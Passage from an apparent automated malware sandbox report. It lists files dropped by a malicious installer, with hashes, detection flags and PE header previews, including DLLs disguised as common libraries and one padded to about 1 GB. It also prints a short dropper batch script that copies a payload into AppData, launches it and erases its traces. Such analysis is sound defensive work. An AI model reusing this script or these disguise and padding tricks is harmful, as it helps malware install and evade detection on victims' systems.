                                                                                                                          SHA-512:647F151D68094BCCC313006C6BCA06505A2EBDE58C014901D71FFED01285172F124EF0FA400A6481D30BFBA021C674959AF0D2061BB11466A28BB79C096A20E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.>..i"_(..9E..+.S-..;.f.-.si..MZ......c:...

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724088
                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-O3LDO.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-PO10S.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...d.&d...........!...I.p...............................................................@.....................................................................V....................................................................................code....o.......p.................. ..`.data...8............t..............@....rdata..............................@..@.edata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libcrypto-1_1.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2098416
                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):713456
                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\libssl-1_1.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\quartz.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...d.&d...........!...I.p...............................................................@.....................................................................V....................................................................................code....o.......p.................. ..`.data...8............t..............@....rdata..............................@..@.edata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\2teu9t.cfg

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):43
                                                                                                                          Entropy (8bit):5.147194987260237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Sq5uPjUyADkIBtn:Sq58jXRcn
                                                                                                                          MD5:8F4CE44A5E8091CB181665143152AFCB
                                                                                                                          SHA1:17A094A6F2D68749DFE92C59626291DC45F2F672
                                                                                                                          SHA-256:CFDEB9B5BCA81247A01C294F66CAD0E78BC3DE957FDBFF9C907C00AF1718E9A5
                                                                                                                          SHA-512:70689E1EF53CCBFFF4E83C6A92A543E5CF122DFD95DD57F61E918C0469C36B2653CE08004447C7A9A7663F0AECFCFB6300AFBE134300F1CFF619420D324C5B11
                                                                                                                          Malicious:false
                                                                                                                          Preview:..8..DXP;...&..P_.e....SAFH.J.......J....lF

